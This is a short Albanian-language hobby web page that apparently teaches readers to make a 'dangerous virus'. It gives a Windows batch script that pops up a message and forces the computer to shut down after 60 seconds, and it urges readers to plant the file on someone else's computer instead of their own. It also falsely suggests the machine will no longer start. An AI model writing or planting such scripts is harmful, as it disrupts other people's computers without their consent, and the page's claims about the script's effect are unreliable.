si te krijojm nje virus te rrezikshen thing
1.Hapim Notepad
2.E Shkruajm Kete:

@echo
msg * System-Coder
shutdown -s -t 60 -c "System-Coder KHG"

3.Dhe E Ruajm SiTeDoni.bat

po menoj naj kujt ne kompjoter me ja ba jo ne te juvin se nuk qelet ma

aiit klm?
 
 
 
 
 
 
 
 
Sod ne faqen ton pati 289637 visitors (1419555 hits) Ne ket faqe
This website was created for free with Own-Free-Website.com. Would you also like to have your own website?
Sign up for free